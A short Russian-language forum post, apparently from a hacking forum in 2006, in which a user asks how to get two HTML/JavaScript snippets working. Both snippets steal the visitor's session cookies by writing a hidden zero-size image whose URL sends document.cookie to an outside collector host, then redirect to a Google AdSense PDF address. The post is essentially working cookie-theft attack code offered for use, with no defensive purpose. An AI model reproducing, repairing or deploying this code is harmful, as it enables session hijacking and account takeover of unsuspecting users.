Показать сообщение отдельно

  #2  
Старый 06.08.2006, 11:31
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

ребята как заставить его работать ?

Код:
<html>
<script> 
document.write('<img src="http://blablabla.org/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
</script>
</html>
или

Код:
<html>
<script> 
document.write('<img src="http://antichat.ru/cgi-bin/s.jpg?'+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
</script>
</html>
 
Ответить с цитированием